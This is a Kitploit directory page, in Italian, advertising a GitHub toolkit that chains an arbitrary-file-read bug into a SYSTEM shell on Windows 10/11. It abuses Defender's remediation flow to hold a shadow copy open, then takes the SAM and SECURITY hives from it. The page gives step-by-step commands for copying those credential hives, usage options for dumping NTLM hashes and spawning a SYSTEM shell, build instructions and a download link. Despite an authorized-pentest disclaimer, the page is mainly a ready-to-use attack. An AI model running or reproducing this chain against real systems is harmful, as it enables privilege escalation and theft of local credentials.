Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
vss-fr2system — test | Kitploit
Strumenti/GitHubGitHub/sailay1996/vss-fr2system
Password CrackingEscalation di PrivilegiAnalisi delle VulnerabilitàExploitPost-ExploitPenetration TestingRed Teaming
GitHubsailay1996/vss-fr2system

vss-fr2system

test

Vedi Repository
108193 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

vss-fr2system

Due piccoli strumenti che trasformano un bug di lettura arbitraria di file su Windows in una shell SYSTEM.

  • vss_freeze/ — crea una Volume Shadow Copy come utente standard, poi la tiene aperta così hai tempo di leggere gli hive SAM/SECURITY/SYSTEM al suo interno
  • fr2system/ — prende gli hive copiati, decrittografa gli hash NTLM locali offline e apre una shell SYSTEM

Insieme a qualsiasi primitiva di lettura arbitraria di file che giri come SYSTEM (o qualsiasi cosa che possa leggere da \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\...), questa è una catena completa utente standard → SYSTEM su una macchina Win10/Win11 predefinita.


Contesto

Questo è stato estratto da BlueHammer — la ricerca sull'abuso di Windows Defender in cui abbiamo scoperto che far cadere un file EICAR in un percorso monitorato induce Defender a creare una Volume Shadow Copy come parte del suo flusso di remediation. Abbiamo tenuto un oplock batch su RstrtMgr.dll nel percorso di caricamento di Defender, così Defender rimane fermo all'inizio della remediation, il che a sua volta mantiene vivo il VSS per tutto il tempo necessario.

In origine c'era anche un freeze cldflt di Stage 2, ma cldflt rifiuta i provider di sincronizzazione non-OneDrive su Win11 24H2 (CfRegisterSyncRoot restituisce 0x80070057). Tenere semplicemente aperto l'oplock di Stage 1 si è rivelato sufficiente: Defender resta in pausa, il VSS resta vivo e non serve alcuna API Cloud Files.


La catena

LPE reale (hai già una lettura arbitraria di file)

root@kitploit:~
[ vss_simple_freeze.exe ]   →   [ your arb-read PoC ]   →   [ fr2system.exe ]
   creates VSS as std user        reads SAM/SECURITY        cracks NTLM, pops SYSTEM
   holds it via oplock            out of the VSS path       shell
  1. Esegui vss_simple_freeze.exe --hold 120 come utente normale. Stampa il percorso VSS, es. \Device\HarddiskVolumeShadowCopy7.
  2. Esegui il tuo bug di lettura arbitraria di file per leggere questi dal VSS:
    • \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\Windows\System32\Config\SAM
    • \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\Windows\System32\Config\SECURITY
    • Mettili come C:\Windows\Temp\fileread\SAM e C:\Windows\Temp\fileread\SECURITY.
  3. Esegui fr2system.exe. Shell SYSTEM.

Test senza bug di lettura arbitraria

Se vuoi solo verificare che la catena funzioni end-to-end sulla tua macchina, simula il passaggio di lettura arbitraria con una cmd da amministratore:

root@kitploit:~
:: Window 1 - std user
vss_simple_freeze.exe --hold 300

:: Window 2 - admin cmd (simulating the arb-read primitive)
mkdir C:\Windows\Temp\fileread
copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\Windows\System32\Config\SAM"      C:\Windows\Temp\fileread\SAM
copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\Windows\System32\Config\SECURITY" C:\Windows\Temp\fileread\SECURITY

:: Window 3 - std user again
fr2system.exe

(Sostituisci 7 con il numero stampato da vss_simple_freeze.)


Utilizzo

vss_simple_freeze

root@kitploit:~
vss_simple_freeze.exe [options]

  --hold N            Auto-release after N seconds (default: wait for Enter)
  --auto              Non-interactive, hold up to 600s
  --publish FILE      Write VSS path to FILE (default: %TEMP%\vss_current.txt)
  --no-publish        Don't write VSS path anywhere
  --event NAME        Release when named event Local\NAME is signaled
  --quiet             Suppress per-second liveness output
  --help              Show help

Examples:
  vss_simple_freeze.exe                              # interactive, Enter to release
  vss_simple_freeze.exe --hold 120                   # auto-release after 2 min
  vss_simple_freeze.exe --event lpe_done --hold 300  # release on signal or 5 min

fr2system

root@kitploit:~
fr2system.exe [options]

  (none)                Default - read SAM/SECURITY from C:\Windows\Temp\fileread, escalate to SYSTEM
  --dump                Dump NTLM hashes only, don't escalate
  --scan                Scan for alternative credential sources
  --path DIR            Use a different input directory
  --help                Show help

Examples:
  fr2system.exe
  fr2system.exe --dump
  fr2system.exe --path C:\lab\hives

fr2system.exe si aspetta almeno SAM nella directory di input. SECURITY è opzionale (usato per i segreti LSA / chiavi DPAPI).


Compilazione

Entrambi i progetti usano MSVC (CRT statico, x64).

root@kitploit:~
cd vss_freeze
build_vss_simple_freeze.bat

cd fr2system
msbuild fr2system.sln /p:Configuration=Release /p:Platform=x64

Schermate

Creazione VSS:

esecuzione vss_simple_freeze

fr2system → shell SYSTEM:

esecuzione fr2system


Note

  • Testato su Win10 22H2 e Win11 23H2/24H2 con Defender abilitato.
  • La tecnica VSS si basa sul flusso di remediation di Defender. Con Defender disabilitato o sostituito da un altro AV, l'oplock di Stage 1 non scatterà e non verrà creato alcun VSS — in quel caso scegli un'altra primitiva VSS.
  • Questo è materiale di ricerca / strumentazione per pentest autorizzati. Non eseguirlo su sistemi su cui non sei autorizzato.
Scarica lo strumento